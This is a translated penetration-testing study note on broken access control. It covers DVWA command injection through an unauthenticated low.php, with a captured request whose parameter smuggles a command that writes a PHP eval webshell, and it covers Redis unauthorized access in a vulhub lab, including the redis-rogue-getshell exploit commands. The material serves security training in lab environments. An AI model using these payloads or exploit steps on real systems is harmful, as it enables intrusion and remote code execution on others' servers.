Invalid access control (override of authority)
1. Invalid access control (override of authority)
1.1 OWASP TOP10
1.1.1 A5:2017-Broken Access Control
Proper access controls are not implemented for authenticated users. Attackers can exploit these flaws to gain access to unauthorized functions or data, such as: access other users' accounts, view sensitive files, modify other users' data, change access rights, etc.
1.1.2 A01:2021-Broken Access Control
Access control enforces policies so that users cannot act outside of their intended permissions. Failure of access control often results in unauthorized disclosure of information, modification or destruction of all data, or execution of business functions outside of user privileges.
1.2 Invalid access control categories
Permission movement direction
1.2.1 Horizontal ultra vires
Ultra vires: Most likely refers to lateral movement between accounts of the same level, and most likely refers to web applications
1.2.2 Vertical ultra vires
Privilege escalation: The high probability refers to the escalation of privileges due to operating system vulnerabilities, and ordinary users obtain administrator privileges
1.3 Attack and defense cases
1.3.1 DVWA ultra vires
POST /dvwa_2.0.1/vulnerabilities/exec/source/low.php HTTP/1.1 Host: 192.168.111.15
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.111.15/dvwa_2.0.1/vulnerabilities/exec/source/
Connection: close
Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded Content-Length: 77
ip=127.0.0.0.1|echo+"<?php+@eval($_REQUEST[777])?>"+>+shell.php&Submit=Submit
1.3.1.1 Practical operation
In the server where DVWA is deployed, open the C drive->open phpstudy->open WWW->open DV, what we care about is config (global configuration), hackable (in hackable there are flags<included file>, upload<upload file>), vulnerabilities (vulnerability points)
Start bp, open the browser to access DVWA, click Command Injection (Commod Injection) to perform command injection, enter 127.0.0.1
Use bp to capture packets, capture the data packets injected by the command, and send the resender
It was found that the ping command was executed and the ping was 127.0.0.1, indicating that there are command splicing here and additional commands can be executed. Do command splicing to execute the logic of the command
command1 & command2 #执行command1命令没有问题的时候再执行command2
command1 | command2 #管道符执行command1的结果作为command2的输入
command1 || command2 #command1执行失败则执行command2,command1执行成功则不执行command2
command1 ; command2 #command1执行结束再执行command2
To execute additional commands, use & to separate because the original data packet already has &, then the & for command separation needs to be url-encoded, select the & for separating commands and press Ctrl+u
Click send
It is found that the value of security in the cookie is low, indicating that it is primary; the script carrying the primary is in the source file in exec under vulnerabilities
Open low.php to view the source code. There is no access control restriction on the entire file, which means that low.php can still be accessed even after logging out.
Copy the path of low.php, exit DVWA login, and visit
http://192.168.16.136/dv/vulnerabilities/exec/source/low.php
The interface is empty, and commands can be executed against this interface. bp finds the data packet of the current page, sends the repeater, clicks send (send), and the page does not respond.
Delete the cookie and change the data submission method to POST (right-click Change request method) and pass two variables at the same time: ip=127.0.0.1%26whoami&Submit=Submit
. First, give a submit to ensure that the if judgment in the low.php code is bypassed, and then give an IP to splice the ping command. But there is no echo in the response of the data packet.
The returned result cannot judge whether the command is executed successfully or not. Replace the whoami command with calc (open the calculator), and the calculator will pop up on the server where the dvwa shooting range is deployed, indicating that the command is executed successfully.
dvwa requires users to log in to answer the questions in dvwa, but we just answered the questions in dvwa without logging in. Although there is no echo, when the vulnerability is detected, we only care about whether the command is executed. As long as the command Executed, whether there is an echo or not, it means that this is an unauthorized access vulnerability (invalid access control.)
1.3.1.2 Using vulnerabilities to write webshell
implement
echo xujie >xujie.txt
Go to the /exec/source directory and there is a newly created xujie.txt file.
Generally, creating a new file in a certain directory of the target will take a lot of action. Use the dnslog.cn platform to click to create a domain name and parse the domain name.
nslookup 域名
After the parsing is completed, check whether there are parsing records on the dnslog.cn platform. If there are parsing records, it means that nslookup was executed successfully.
Create a one-sentence Trojan
echo "<?php @eval($_REQUEST[777])?>" >shell.php
Visit shell.php, and then use Ant Sword to connect
1.4 Related vulnerabilities
1.4.1 Directory traversal
Directory traversal, directory traversal, Directory Traversal. .Web users, in some way, can access files outside the web root directory and even execute system commands.
Causes of directory traversal vulnerabilities:
- file contains
- file reading
- RCE
1.4.2 Unauthorized access
Unauthorized access. Unauthorized Access. ==Important assets do not have access control restrictions at all, ==As a result, hackers can operate important assets without authorization, including sensitive operations such as reading and writing files, and executing commands.
2. Unauthorized access
2.1 Unauthorized access to Redis
Accessing the database without using an account password, Redis is unauthorized: due to unauthorized access to the database, sensitive data is leaked; the database can read and write files, and if the unauthorized access vulnerability is exploited for vulnerability attacks, you can write a shell and create an SSH public Key, scheduled task rebound shell;
2.1.1 Introduction to Redis
Redis is a non-relational database system. It does not have the logical structure of database tables and only stores data in the form of key-value pairs.
Redis database is often used for caching in web applications.
Redis can interact with the file system.
Redis listens to TCP/6379
Redis database port number: 6379
2.1.2 Simple use of Redis
Redis does not set a password and client tools can be linked directly.
┌──(ajest�� zh-CN)-[~/vulhub/vulhub/redis/4-unacc]
└─$ redis-cli -h 127.0.0.1 127.0.0.1:6379> set name AJEST OK
127.0.0.1:6379> get name "AJEST"
127.0.0.1:6379> config set dir /tmp/
OK
127.0.0.1:6379> config set dbfilename ajest.txt OK
127.0.0.1:6379> save OK
127.0.0.1:6379>
2.1.3 Unauthorized access to Redis
Read database contents | Read and write system files | Execute system commands |
---|---|---|
data breach | Directly write WebShell scheduled tasks to rebound shell SSH password-free login |
redis-rogue-getshell |
2.2 Redis practical operation
2.2.1 Environment setup
CD to the /vulhub/redis/4-unacc directory and enter
sudo docker-compose up -d
Open the Redis environment
2.2.2 Exploiting vulnerabilities
sudo docker ps -a
View port number
enter
redis-cli -h 127.0.0.1 #-h指定参数,连接本机的reids数据库
Directly connected to the redis database without an account or password. It indicates that there is an unauthorized access vulnerability in the database.
The redis database stores data in key-value pairs. You can imagine the redis database as a very large array. The redis database is often cached.
config set dir /tmp/
config set dbfilename xujie.txt #将数据库存储在xujie.txt文件中,这个文件在tmp下
Because the connection is to the database of the docker container, CD to the container to check whether the created database exists.
sudo docker exec -it 9a4f956818dc /bin/bash #-it是指容器的id,/bin/bash是指登录到9a4f956818dc这个容器
To prove whether the created database exists and has read and write permissions.
ls /tmp
cat /tmp/xujie.txt
4-unacc has a master-slave replication vulnerability, and master-slave replication can execute system commands. Executing system commands requires an exploit script.
cd tools
proxychains git clone https://github.com/vulhub/redis-rogue-getshell.git
cd redis-rogue-getshell
cd RedisModulesSDK
make
cd ..
python3 redis-master.py -r 127.0.0.1 -p 6379 -L 192.168.16.175 -P 8888 -f RedisModulesSDK/exp.so -c "id"
python3 redis-master.py -r 127.0.0.1 -p 6379 -L 192.168.16.175 -P 8888 -f RedisModulesSDK/exp.so -c "whoami"
Here you can exploit database vulnerabilities
2.2.3 Vulnerability detection
The exploit tool is unauthorized and can be used to detect unauthorized access vulnerabilities. A total of thirty-eight vulnerability detections are provided
cd ~/tools
ls
cd unauthorized_com
python3 unauthorized_com.py -i 127.0.0.1